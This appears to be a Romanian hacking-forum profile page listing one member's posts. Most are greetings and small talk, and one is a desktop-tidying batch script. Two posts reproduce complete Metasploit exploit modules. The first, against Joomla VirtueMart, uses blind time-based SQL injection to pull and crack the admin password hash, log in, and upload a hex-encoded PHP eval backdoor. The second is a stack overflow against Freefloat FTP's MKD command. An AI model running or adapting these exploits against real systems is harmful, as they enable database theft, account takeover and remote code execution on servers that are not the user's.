Jump to content

LLegoLLaS

Active Members
  • Posts

    2060
  • Joined

  • Last visited

  • Days Won

    11

Everything posted by LLegoLLaS

  1. # Exploit Title: Joomla 1.5 com_virtuemart <= 1.1.7 blind time-based sql injection MSF module # Date: Thu Jul 28, 2011 # Author: TecR0c - tecr0c.mythsec [@] gmail.com # Version: <= 1.1.7 # Download: VirtueMart - Files - VirtueMart # Greetz: mythsec team, James Bercega for code base for sqli blind require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Joomla 1.5 VirtueMart Component <= 1.1.7 Blind SQL Injection', 'Description' => %q{ A vulnerability was discovered by Rocco Calvi and Steve Seeley which identifies unauthenticated time-based blind SQL injection in the "page" variable of the virtuemart component. This vulnerability allows an attacker to gain information from the database with specially crafted URLs taking advantage of the MySQL benchmark. This issue was patched in version 1.1.7a. }, 'Author' => [ 'TecR0c', #Initial discovery, msf module 'mr_me', #Initial discovery with TecR0c ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.exploit-db.com/exploits/17132/' ], [ 'URL','http://www.stratsec.net/Research/Advisories/' ], ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Feb 11 2011', 'DefaultTarget' => 0 )) register_options( [ OptString.new('JDIR', [true, 'Joomla directory', '/']), OptInt.new('BMCT', [true, 'Benchmark Counter', 50000000 ]), OptInt.new('BMDF', [true, 'Benchmark Difference', 3 ]), OptInt.new('BMRC', [true, 'Benchmark Request Count', 1 ]), OptString.new('WLIST', [true, 'Wordlist location', '/home/foo/bar.txt' ]), OptString.new('AGNT', [false, 'User Agent Info', 'Mozilla/5.0' ]), OptString.new('PREF', [false, 'Database prefixt', 'jos_' ]), OptString.new('JQRY', [false, 'URI to trigger bug', 'index.php?option=com_virtuemart&page=1' ]) ], self.class) end ################################################# # Extract "Set-Cookie" def init_cookie(data, cstr = true) # Raw request? Or cookie data specifically? data = data.headers['Set-Cookie'] ? data.headers['Set-Cookie']: data # Beginning if ( data ) # Break them apart data = data.split(', ') # Initialize ctmp = '' tmps = {} # Parse cookies data.each do | x | # Remove extra data x = x.split(';')[0] # Seperate cookie pairs if ( x =~ /([^;\s]+)=([^;\s]+)/im ) # Key k = $1 # Val v = $2 # Valid cookie value? if ( v.length() > 0 ) # Build cookie hash tmps[k] = v # Report cookie status print_status("Got Cookie: #{k} => #{v}"); end end end # Build string data if ( cstr == true ) # Loop tmps.each do |x,y| # Cookie key/value ctmp << "#{x}=#{y};" end # Assign tmps['cstr'] = ctmp end # Return return tmps else # Something may be wrong init_debug("No cookies within the given response") end end ################################################# # Simple debugging output def init_debug(resp, exit = 0) # Continue execution if ( exit.to_i > 0 ) # Exit exit(0) end end ################################################# # Generic post wrapper def http_post(url, data, headers = {}, timeout = 15) # Protocol proto = datastore['SSL'] ? 'https': 'http' # Determine request url url = url.length ? url: '' # Determine User-Agent headers['User-Agent'] = headers['User-Agent'] ? headers['User-Agent'] : datastore['AGNT'] # Determine Content-Type headers['Content-Type'] = headers['Content-Type'] ? headers['Content-Type'] : "application/x-www-form-urlencoded" # Determine Content-Length headers['Content-Length'] = data.length # Determine Referer headers['Referer'] = headers['Referer'] ? headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}" # Delete all the null headers headers.each do | hkey, hval | # Null value if ( !hval ) # Delete header key headers.delete(hkey) end end # Send request resp = send_request_raw( { 'uri' => datastore['JDIR'] + url, 'method' => 'POST', 'data' => data, 'headers' => headers }, timeout ) # Returned return resp end ################################################# # Generic post multipart wrapper def http_post_multipart(url, data, headers = {}, timeout = 15) # Boundary string bndr = Rex::Text.rand_text_alphanumeric(8) # Protocol proto = datastore['SSL'] ? 'https': 'http' # Determine request url url = url.length ? url: '' # Determine User-Agent headers['User-Agent'] = headers['User-Agent'] ? headers['User-Agent'] : datastore['AGNT'] # Determine Content-Type headers['Content-Type'] = headers['Content-Type'] ? headers['Content-Type'] : "multipart/form-data; boundary=#{bndr}" # Determine Referer headers['Referer'] = headers['Referer'] ? headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}" # Delete all the null headers headers.each do | hkey, hval | # Null value if ( !hval ) # Delete header key headers.delete(hkey) end end # Init temp = '' # Parse form values data.each do |name, value| # Hash means file data if ( value.is_a?(Hash) ) # Validate form fields filename = value['filename'] ? value['filename']: init_debug("Filename value missing from #{name}", 1) contents = value['contents'] ? value['contents']: init_debug("Contents value missing from #{name}", 1) mimetype = value['mimetype'] ? value['mimetype']: init_debug("Mimetype value missing from #{name}", 1) encoding = value['encoding'] ? value['encoding']: "Binary" # Build multipart data temp << "--#{bndr}\r\n" temp << "Content-Disposition: form-data; name=\"#{name}\" ; filename=\"#{filename}\"\r\n" temp << "Content-Type: #{mimetype}\r\n" temp << "Content-Transfer-Encoding: #{encoding}\r\n" temp << "\r\n" temp << "#{contents}\r\n" else # Build multipart data temp << "--#{bndr}\r\n" temp << "Content-Disposition: form-data; name=\"#{name}\";\r\n" temp << "\r\n" temp << "#{value}\r\n" end end # Complete the form data temp << "--#{bndr}--\r\n" # Assigned data = temp # Determine Content-Length headers['Content-Length'] = data.length # Send request resp = send_request_raw( { 'uri' => datastore['JDIR'] + url, 'method' => 'POST', 'data' => data, 'headers' => headers }, timeout) # Returned return resp end ################################################# # Generic get wrapper def http_get(url, headers = {}, timeout = 15) # Protocol proto = datastore['SSL'] ? 'https': 'http' # Determine request url url = url.length ? url: '' # Determine User-Agent headers['User-Agent'] = headers['User-Agent'] ? headers['User-Agent'] : datastore['AGNT'] # Determine Referer headers['Referer'] = headers['Referer'] ? headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}" # Delete all the null headers headers.each do | hkey, hval | # Null value // Also, remove post specific data, due to a bug ... if ( !hval || hkey == "Content-Type" || hkey == "Content-Length" ) # Delete header key headers.delete(hkey) end end # Send request resp = send_request_raw({ 'uri' => datastore['JDIR'] + url, 'headers' => headers, 'method' => 'GET', }, timeout) # Returned return resp end ################################################# # Used to perform benchmark querys def sql_benchmark(test, hdrs, table = nil, where = '1+LIMIT+1', tnum = nil ) # Init wait = 0 # Defaults table = table ? table: 'users' # SQL Injection string used to trigger the MySQL BECNHMARK() function sqli = ("'+UNION+SELECT+IF(#{test},+BENCHMARK(#{datastore['BMCT']},\ +MD5(1)),+0)+FROM+#{datastore['PREF']}#{table}+WHERE+#{where}--+sqli.page") # Number of tests to run. We run this # amount of tests and then look for a # median value that is greater than # the benchmark difference. tnum = tnum ? tnum: datastore['BMRC'] # Run the tests tnum.to_i.times do | i | # Start time bmc1 = Time.now.to_i # Make the request init_debug(http_get("#{datastore['JQRY']}#{sqli}", hdrs)) # End time bmc2 = Time.now.to_i # Total time wait += bmc2 - bmc1 end # Return the results return ( wait.to_i / tnum.to_i ) end ################################################# # Used to perform benchmark querys def sql_benchmark_2(hdrs, columns = nil, table = nil, where = '1+LIMIT+1', tnum = nil ) # Init wait = 0 # Defaults table = table ? table: 'users' # SQL Injection string used to trigger the MySQL BECNHMARK() function sqli = ( "'+UNION+SELECT+IF(substring((select+#{columns}+FROM+#{datastore['PREF']}#{table}+WHERE+#{where}),1,1),BENCHMARK(#{datastore['BMCT']},+MD5(1)),+0)--+sqli.page") # Number of tests to run. We run this # amount of tests and then look for a # median value that is greater than # the benchmark difference. tnum = tnum ? tnum: datastore['BMRC'] # Run the tests tnum.to_i.times do | i | # Start time bmc1 = Time.now.to_i # Make the request init_debug(http_get("#{datastore['JQRY']}#{sqli}", hdrs)) # End time bmc2 = Time.now.to_i # Total time wait += bmc2 - bmc1 end # Return the results return ( wait.to_i / tnum.to_i ) end ################################################# def get_password(hash, salt, opts = nil) # Wordlist wlst = datastore['WLIST'] # Init cntr = 0 # Verbose print_status("Attempting to crack admin password hash") # Valid hash length only if ( hash.length != 32 ) # Failure print_error("Invalid Joomla MD5 hash: #{hash.to_s}") return nil end # Does the wordlist exist? if ( !File.exist?(wlst) ) # Failure print_error("Unable to load wordlist: #{wlst}") return nil else # Load the wordlist file list = File.readlines(wlst) end # Verbose print_status("Loaded #{list.count.to_s} words from the specified list") print_status("This may take quite some time ...") # Start time bmc1 = Time.now.to_i # Loop through list list.each do | word | # Cleanup word = word.strip # Counter cntr = cntr + 1 # Attempt to find the plaintext password if ( hash == Rex::Text.md5(word + salt) ) # Success! print_status("Successfully cracked the following hash") print_status("#{hash} => #{salt} == #{word}") # Ended time bmc2 = Time.now.to_i # Duration bmc3 = bmc2 - bmc1 bmc3 = ( bmc3 < 60 ) ? "#{bmc3} seconds": "#{(bmc3/60)} minutes" # Verbose print_status("Operation completed in #{bmc3}") # Return return word end # if end # each # Failure print_error("Unable to crack the following hash") print_error("#{hash} => #{salt} == ???") # Ended time bmc2 = Time.now.to_i # Duration bmc3 = bmc2 - bmc1 bmc3 = ( bmc3 < 60 ) ? "#{bmc3} seconds": "#{(bmc3/60)} minutes" # Verbose print_status("Operation completed in #{bmc3}") # Return return nil end ################################################# def get_users_data(hdrs, snum, slim, cset, sqlf, sqlw) # Start time tot1 = Time.now.to_i # Initialize reqc = 0 retn = String.new # Extract salt for i in snum..slim # Offset position oset = ( i - snum ) + 1 # Loop charset for cbit in cset # Test character cbit.each do | cchr | # Start time (overall) bmc1 = Time.now.to_i # Benchmark query bmcv = sql_benchmark("SUBSTRING(#{sqlf},#{i},1)+LIKE+BINARY+CHAR(#{cchr.ord})", hdrs,"users", sqlw, datastore['BMRC']) # Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) ) # Verbose print_status(sprintf("Character %02s is %s", oset.to_s, cchr )) # Append chr retn << cchr # Exit loop break end # Counter reqc += 1 end # each end # for # Host not vulnerable? if ( oset != retn.length ) # Failure print_error("Unable to extract character ##{oset.to_s}\ . Extraction failed!") return nil end end # for # End time (total) tot2 = Time.now.to_i # Benchmark totals tot3 = tot2 - tot1 # Verbose print_status("Found data: #{retn}") print_status("Operation required #{reqc.to_s} requests (#{( tot3 / 60).to_s} minutes)") # Return return retn end ################################################# def check print_status("Attempting to determine virtuemart version") resp = http_get("modules/mod_virtuemart_currencies/mod_virtuemart_currencies.xml") # Extract Joomla version information if ( resp.body =~ /<version>([^\s]+)<\/version>/ ) # Version vers = $1.strip # Version "parts" ver1, ver2, ver3 = vers.split(/\./) # Only if version 1.1.7 if ( ver3.to_i >= 7) # Exploit failed init_debug(resp) print_status("Please confirm manually") return Exploit::CheckCode::Safe else print_status("The target is running VirtueMart : #{vers}") return Exploit::CheckCode::Vulnerable end else # Verbose print_error("Unable to determine Joomla version ...") end end ################################################# def exploit # Numeric test string tstr = Time.now.to_i.to_s # MD5 test string tmd5 = Rex::Text.md5(tstr) # Encoded payload load = payload.encoded ################################################# # STEP 02 // Get the cookie for virtuemart ################################################# # request to get virtuemart cookie resp = http_get("index.php?option=com_virtuemart&page=1") # Init cookie cook = init_cookie(resp) # Build headers for authenticated session hdrs = { "Cookie" => cook['cstr'] } ################################################# # STEP 03 // Calculate BENCHMARK() response times ################################################# # Verbose print_status("Calculating target response times") print_status("Benchmarking #{datastore['BMRC']} normal requests") # Normal request median (globally accessible) datastore['BMC0'] = sql_benchmark("1=2", hdrs) # Verbose print_status("Normal request avg: #{datastore['BMC0'].to_s} seconds") print_status("Benchmarking #{datastore['BMRC']} delayed requests") # Delayed request median bmc1 = sql_benchmark("1=1", hdrs) # Verbose print_status("Delayed request avg: #{bmc1.to_s} seconds") # Benchmark totals bmct = bmc1 - datastore['BMC0'] # Delay too small. The host may not be # vulnerable. Try increasing the BMCT. if ( bmct.to_i < datastore['BMDF'].to_i ) # Verbose print_error("your benchmark threshold is small, or host is not vulnerable") print_error("increase the benchmark threshold adjust the value of the BMDF") print_error("increase the expression iterator adjust the value of the BMCT") return else # Host appears exploitable print_status("Request Difference: #{bmct.to_s} seconds") end ################################################# # STEP 04 // Attempting to find a valid admin id ################################################# atot = 0 # Total admins scnt = 0 # Step counter step = 10 # Step increment slim = 10000 # Step limit # 42 is the hard coded base uid within Joomla ... # ... and the answer to the ultimate question! ;] snum = ( !defined?(auid) ) ? 62: auid # changed from 42 to 62 # Verbose print_status("Calculating total number of administrators") # Check how many admin accounts are in the database for i in 0..slim do # Benchmark bmcv = sql_benchmark_2(hdrs, "gid", "users", "gid=25+LIMIT+#{i.to_s},1",datastore['BMRC']) # If we do not have a delay, then we have reached the end ... if ( !( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) ) ) # Range atot = i # Verbose print_status("Successfully confirmed #{atot.to_s} admin accounts") # Exit loop break end end # Loops until limit while ( snum < slim && scnt < atot ) # Verbose print_status("Attempting to find a valid admin ID") # Verbose print_status("Stepping from #{snum.to_s} to #{slim.to_s} by #{step.to_s}") for i in snum.step(slim, step) bmcv = 0 # Benchmark bmcv = sql_benchmark("#{i}+>+id", hdrs, "users","gid=25+LIMIT+#{scnt.to_s},1", datastore['BMRC']) # Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) ) # Range itmp = i # Exit loop break else # Out of time .. if ( i == slim ) # Failure print_error("Unable to find a valid user id. Exploit failed!") return end end end # Jump back by #{step} and increment by one for i in ( snum ).upto(( itmp )) bmcv = 0 auid = 0 # Benchmark bmcv = sql_benchmark("id+=+#{i}", hdrs, "users", "gid=25", datastore['BMRC']) # Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) ) # UserID - first time auid gets set to 62 auid = i # Verbose print_status("Found a valid admin account uid : #{auid.to_s}") # Step Counter scnt += 1 # Exit loop break else # Out of time .. if ( i == ( itmp + step ) ) # Failure print_error("Unable to find a valid user id. Exploit failed!") return end end end ################################################# # These are the charsets used for the enumeration # operations and can be easily expanded if needed ################################################# # Hash charset a-f0-9 hdic = [ ('a'..'f'), ('0'..'9') ] # Salt charset a-zA-Z0-9 sdic = [ ('a'..'z'), ('A'..'Z'), ('0'..'9') ] # Username charset udic = [ ('a'..'z'), ('A'..'Z'), ('0'..'9') ] ################################################# # STEP 05 // Attempt to extract admin pass hash ################################################# # Verbose print_status("Attempting to gather admin password hash") # Get pass hash - changed bs if ( auid != 0 && !( hash = get_users_data( hdrs, # Pass cookie value 1, # Length Start 32, # Length Maximum hdic, # Charset Array "password", # SQL Field name "id=#{auid.to_s}" # SQL Where data ) ) ) # Failure print_error("Unable to gather admin pass hash. Exploit failed!!") return end ################################################# # STEP 06 // Attempt to extract admin pass salt ################################################# # Verbose print_status("Attempting to gather admin password salt") # Get pass salt - changed bs if ( auid != 0 && !( salt = get_users_data( hdrs, # Pass cookie value 34, # Length Start 65, # Length Maximum sdic, # Charset Array "password", # SQL Field name "id=#{auid.to_s}" # SQL Where data ) ) ) # Failure print_error("Unable to gather admin pass salt. Exploit failed!!") return end ################################################# # STEP 07 // Attempt to crack the extracted hash ################################################# # Attempt to crack password hash - changed bs if ( auid != 0 ) pass = get_password(hash, salt) end # Got pass? - changed bs if ( auid != 0 && pass ) ################################################# # STEP 08 // Attempt to extract admin username ################################################# # Verbose print_status("Attempting to determine target username length") # Hard limit is 150 for i in 1.upto(150) # Benchmark bmcv = sql_benchmark("LENGTH(username)=#{i.to_s}", hdrs, "users", "id=#{auid.to_s}", datastore['BMRC']) # Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) ) # Length ulen = i # Verbose print_status("The username is #{i.to_s} characters long") # Exit loop break end end # Verbose print_status('Gathering admin username') # Get pass salt if ( !( user = get_users_data( hdrs, # Pass cookie value 1, # Length Start ulen, # Length Maximum udic, # Charset Array "username", # SQL Field name "id=#{auid.to_s}" # SQL Where data ) ) ) # Failure print_error("Unable to gather admin user name. Exploit failed!!") return end # Verbose print_status("Attempting to extract a valid request token") # Request a valid token resp = http_get("administrator/index.php") # Extract token if ( resp.body =~ /['|"]([a-f0-9]{32})["|']/ ) # Token rtok = $1 # Verbose print_status("Got token: #{rtok}") else # Failure print_error("Unable to extract request token. Exploit failed!") init_debug(resp) return end # Init cookie cook = init_cookie(resp) # Build headers for authenticated session hdrs = { "Cookie" => cook['cstr'] } ################################################# # STEP 09 // Attempt to authenticate as the admin ################################################# # Verbose print_status("Attempting to login as: #{user}") # Post data for login request post = "username=#{user}&passwd=#{pass}\ ?=&option=com_login&task=login{rtok}=1" # Login request resp = http_post("administrator/index.php", post, hdrs) # Authentication successful??? if ( resp && resp.code == 303 ) # Success print_status("Successfully logged in as: #{user}") else # Failure print_error("Unable to authenticate. Exploit failed!") init_debug(resp) return end ################################################# # STEP 10 // Upload wrapper and execute payload! ################################################# # Verbose print_status("Attempting to extract refreshed request token") # Request a valid token (again) resp = http_get("administrator/index.php?option=com_installer",hdrs) # Extract token if ( resp.body =~ /['|"]([a-f0-9]{32})["|']/ ) # Token rtok = $1 # Verbose print_status("Got token: #{rtok}") else # Failure print_error("Unable to extract request token. Exploit failed!") init_debug(resp.body) return end # Component specific data cstr = "joomla" czip = "com_#{cstr}.zip" curi = "components/com_#{cstr}/#{cstr}.php" ################################################# # Our Joomla specific PHP payload wrapper that is # used to have more flexibility when delivering a # selected payload to a target. The wrapper is in # the Joomla! 1.6 compononent format and can also # be used with other Joomla exploits. ################################################# # # Type: Joomla 1.6 Component # File: com_joomla/joomla.xml <-- installer file # com_joomla/joomla.php <-- component file # # Data: <?php # # Modify settings # error_reporting(0); # ini_set('max_execution_time', 0); # # # Execute the selected payload, and delete the wrapper # @eval(base64_decode(file_get_contents('php://input'))); # ?> ################################################# # Hex encoded component zip data wrap = "\x50\x4B\x03\x04\x0A\x00\x00\x00\x00\x00\x65\xB3\x9A\x3E\x00\x00" wrap << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x63\x6F" wrap << "\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x50\x4B\x03\x04\x0A\x00\x00" wrap << "\x00\x00\x00\x35\xB2\x9A\x3E\x53\x03\xF2\xF9\xAF\x00\x00\x00\xAF" wrap << "\x00\x00\x00\x15\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C" wrap << "\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x70\x68\x70\x3C\x3F\x70\x68" wrap << "\x70\x0D\x0A\x23\x20\x4D\x6F\x64\x69\x66\x79\x20\x73\x65\x74\x74" wrap << "\x69\x6E\x67\x73\x0D\x0A\x65\x72\x72\x6F\x72\x5F\x72\x65\x70\x6F" wrap << "\x72\x74\x69\x6E\x67\x28\x30\x29\x3B\x0D\x0A\x69\x6E\x69\x5F\x73" wrap << "\x65\x74\x28\x27\x6D\x61\x78\x5F\x65\x78\x65\x63\x75\x74\x69\x6F" wrap << "\x6E\x5F\x74\x69\x6D\x65\x27\x2C\x20\x30\x29\x3B\x0D\x0A\x0D\x0A" wrap << "\x23\x20\x45\x78\x65\x63\x75\x74\x65\x20\x74\x68\x65\x20\x73\x65" wrap << "\x6C\x65\x63\x74\x65\x64\x20\x70\x61\x79\x6C\x6F\x61\x64\x0D\x0A" wrap << "\x40\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63" wrap << "\x6F\x64\x65\x28\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E" wrap << "\x74\x65\x6E\x74\x73\x28\x27\x70\x68\x70\x3A\x2F\x2F\x69\x6E\x70" wrap << "\x75\x74\x27\x29\x29\x29\x3B\x0D\x0A\x3F\x3E\x50\x4B\x03\x04\x0A" wrap << "\x00\x00\x00\x00\x00\x91\xB6\x9A\x3E\x8D\x4A\x99\xA9\x07\x01\x00" wrap << "\x00\x07\x01\x00\x00\x15\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F" wrap << "\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x78\x6D\x6C\x3C\x3F" wrap << "\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30" wrap << "\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D" wrap << "\x38\x22\x3F\x3E\x0D\x0A\x3C\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E" wrap << "\x20\x74\x79\x70\x65\x3D\x22\x63\x6F\x6D\x70\x6F\x6E\x65\x6E\x74" wrap << "\x22\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x36\x2E\x30" wrap << "\x22\x3E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x6E\x61" wrap << "\x6D\x65\x3E\x4A\x6F\x6F\x6D\x6C\x61\x3C\x2F\x6E\x61\x6D\x65\x3E" wrap << "\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x66\x69\x6C\x65\x73" wrap << "\x20\x66\x6F\x6C\x64\x65\x72\x3D\x22\x73\x69\x74\x65\x22\x3E\x3C" wrap << "\x66\x69\x6C\x65\x6E\x61\x6D\x65\x3E\x6A\x6F\x6F\x6D\x6C\x61\x2E" wrap << "\x70\x68\x70\x3C\x2F\x66\x69\x6C\x65\x6E\x61\x6D\x65\x3E\x3C\x2F" wrap << "\x66\x69\x6C\x65\x73\x3E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20" wrap << "\x20\x3C\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x69\x6F\x6E" wrap << "\x3E\x3C\x6D\x65\x6E\x75\x3E\x4A\x6F\x6F\x6D\x6C\x61\x3C\x2F\x6D" wrap << "\x65\x6E\x75\x3E\x3C\x2F\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61" wrap << "\x74\x69\x6F\x6E\x3E\x0D\x0A\x3C\x2F\x65\x78\x74\x65\x6E\x73\x69" wrap << "\x6F\x6E\x3E\x0D\x0A\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00" wrap << "\x00\x65\xB3\x9A\x3E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" wrap << "\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00" wrap << "\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x50\x4B" wrap << "\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\x35\xB2\x9A\x3E\x53\x03" wrap << "\xF2\xF9\xAF\x00\x00\x00\xAF\x00\x00\x00\x15\x00\x00\x00\x00\x00" wrap << "\x00\x00\x00\x00\x20\x00\x00\x00\x29\x00\x00\x00\x63\x6F\x6D\x5F" wrap << "\x6A\x6F\x6F\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x70\x68" wrap << "\x70\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\x91\xB6\x9A" wrap << "\x3E\x8D\x4A\x99\xA9\x07\x01\x00\x00\x07\x01\x00\x00\x15\x00\x00" wrap << "\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x0B\x01\x00\x00\x63" wrap << "\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61" wrap << "\x2E\x78\x6D\x6C\x50\x4B\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00" wrap << "\xBF\x00\x00\x00\x45\x02\x00\x00\x00\x00" # Verbose print_status("Attempting to upload payload wrapper component") # Post data data = { # Component data 'install_package' => { 'filename' => czip, 'contents' => wrap, 'mimetype' => 'application/zip', 'encoding' => 'binary', }, # Required install params "installtype" => "upload", "task" => "install.install", "#{rtok}" => "1", } # Upload the wrapper component init_debug(http_post_multipart("administrator/index.php?option=\ com_installer&view=install", data, hdrs)) # Deliver the selected payload to the target init_debug(http_post(curi, Rex::Text.encode_base64(load))) # Shell handler return else # Verbose print_error("Failed to crack hash. Searching for new admin account ...") end # if snum += 1 end # while # Verbose print_error("Unable to crack any admin hashes. Try a better wordlist?") return end end sursa: Joomla 1.5 com_virtuemart <= 1.1.7 Blind time-based SQL Injection (MSF) - BugSearch.net
  2. Salut! @Surge ma gadnesc ca omu' are o varsta deci...speram sa nu fie asa
  3. in genu' asta am futut eu windowsu zilele trecute solved with low level format din ubuntu
  4. imi da eroare cand creez serverul atat pe server 03 cat si pe xop sp3 update la zi+net framework.php functioneaza ok,trimite logul de test
  5. LLegoLLaS

    salutare

    Bine-ai venit!
  6. [+]in timp se va umple desktopul de foldere-data,deci ele vor fi create intr-un folder TEMP [+]separa torrent de restu' [+]shortcuturi (+r silvian0) [+].PSD ->Projects [+] sterge thumbs.db daca aveti setat sa se afiseze fisierele ascunse [+].wav,.wma,.flac [-] nu stiu cum sa ma intorc la desktop in mod ''universal'' Mersi em [+].ico @echo on set folder=%DATE% set folder=%folder:/=.% md TEMP cd TEMP md "%folder%" cd "%folder%" md Pic md Media md Prog md Docs md Other md Torrents md Shortcuts md Projects cd ..\.. DEL Thumbs.db move *.exe "TEMP/%folder%/Other" move *.lnk "TEMP/%folder%/Shortcuts" move *.cpp "TEMP/%folder%/Prog" move *.txt "TEMP/%folder%/Docs" move *.docx "TEMP/%folder%/Docs" move *.pdf "TEMP/%folder%/Docs" move *.xlsx "TEMP/%folder%/Docs" move *.doc "TEMP/%folder%/Docs" move *.gif "TEMP/%folder%/Pic" move *.xls "TEMP/%folder%/Docs" move *.c "TEMP/%folder%/Prog" move *.torrent "TEMP/%folder%/Torrents" move *.avi "TEMP/%folder%/Media" move *.java "TEMP/%folder%/Prog" move *.class "TEMP/%folder%/Prog" move *.mpg "TEMP/%folder%/Media" move *.mp3 "TEMP/%folder%/Media" move *.o "TEMP/%folder%/Prog" move *.rar "TEMP/%folder%/Other" move *.zip "TEMP/%folder%/Other" move *.jpg "TEMP/%folder%/Pic" move *.bmp "TEMP/%folder%/Pic" move *.png "TEMP/%folder%/Pic" move *.srt "TEMP/%folder%/Media" move *.psd "TEMP/%folder%/Projects" move *.flac "TEMP/%folder%/Media" move *.wav "TEMP/%folder%/Media" move *.wma "TEMP/%folder%/Media" move *.ico "TEMP/%folder%/Pic" ps: astept completari sa vedem la cate linii ajungem
  7. Eu am intotdeauna un Folder TEMP dar cu timpul nu mai stie nici dracu ce e acolo...ajunge si la 500mb.Mersi ps: nu muta mp3.urile (xp sp3) LE: gata..nu vazusem ca nu e pus % la mp3
  8. Posturi...aveam rep power 5 si ~1070 posturi.Cred ca s-a sters un topic si ramansesem cu vreo 915 si rep power 4.Deci la 1000 posturi ai rep power 5
  9. Da si mie una sa ma tranceuiesc.Dau si la schimb din ce am
  10. Zilele astea imi fa windowsul si te ajut la design/testare etc daca vrei.Deocamdata nu pot promite nimic
  11. Si eu te rog
  12. Din ce am vazut la telefoanele noi (mai ales cele android si in general astea noi) trebuie sa suni la ei si sa-ti trimita setarile.Incearca si pe siteul lor parca aveau ceva solutii sa ti-l faci singur
  13. LLegoLLaS

    Salut

    Bine-ai venit.Spune ce cunostinte ai in domeniu
  14. La mine nu e..probabil un script detecteaza asta.Verifica profiilurile de pe retelele sociale ale mamei tale (daca sunt).Cauta dupa prieteni numiti mGbot/celulibot/m.e.g.bot Dupa ce te-ai asigurat ca ai facutm ai sus dar tot iti apare mesajul...da-i un pm lu' kwerln
  15. clar pro;)
  16. arunca una si spre mine ai pm cu mail
  17. Bine-ai venit. @Maverick
  18. ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Freefloat FTP Server MKD Command Stack Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability found in the MKD command in the Freefloat FTP server. }, 'Author' => [ 'C4SS!0 G0M3S', # Initial Discovery 'James Fitts' # Metasploit Module ], 'License' => MSF_LICENSE, 'Version' => '$Revision: $', 'References' => [ [ 'URL', 'http://www.exploit-db.com/exploits/17539/' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 700, 'BadChars' => "\x00\x0a\x0d", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x7cb97475, # jmp esp from shell32.dll 'Offset' => 247 } ], ], 'DisclosureDate' => 'Jul 17 2011', 'DefaultTarget' => 0)) end def exploit connect_login print_status("Trying target #{target.name}...") buf = make_nops(target['Offset']) + [target.ret].pack('V') buf << make_nops(20) buf << payload.encoded send_cmd( ['MKD', buf] , false ) handler disconnect end end sursa: bugsearch.net
  19. banuiesc ca doar cateva din ele o sa fie in cluse in pachetul "variat" (cel mai intalnit) celelalte o sa fie cu plata.O sa icnerc sa aflu ceva mai multe
  20. Televizor LED 3D Samsung, 81cm, FullHD, 32D6100 UE32D6100SWXXH - eMAG.ro pro: 3d,smarttv con: nu e de un metru ca si celelalte la pretul asta dar is de ajuns
  21. O inveti...bine-ai venit
  22. Am torrentleech (cont) vorbim pe pm ce si cum daca te intereseaza
  23. Votat da.Ce va tot certati ca ''era mai bine inainte'' sau ''va fi mai bine dupa" (de)TinKode cum au facut si la revolutie si acum se plang ca ''era mai bine inainte''.las ca vedem cu o sa fie
  24. I-a spus Chuck Norris un banc cu pistoale
  25. prin eliminare
×
×
  • Create New...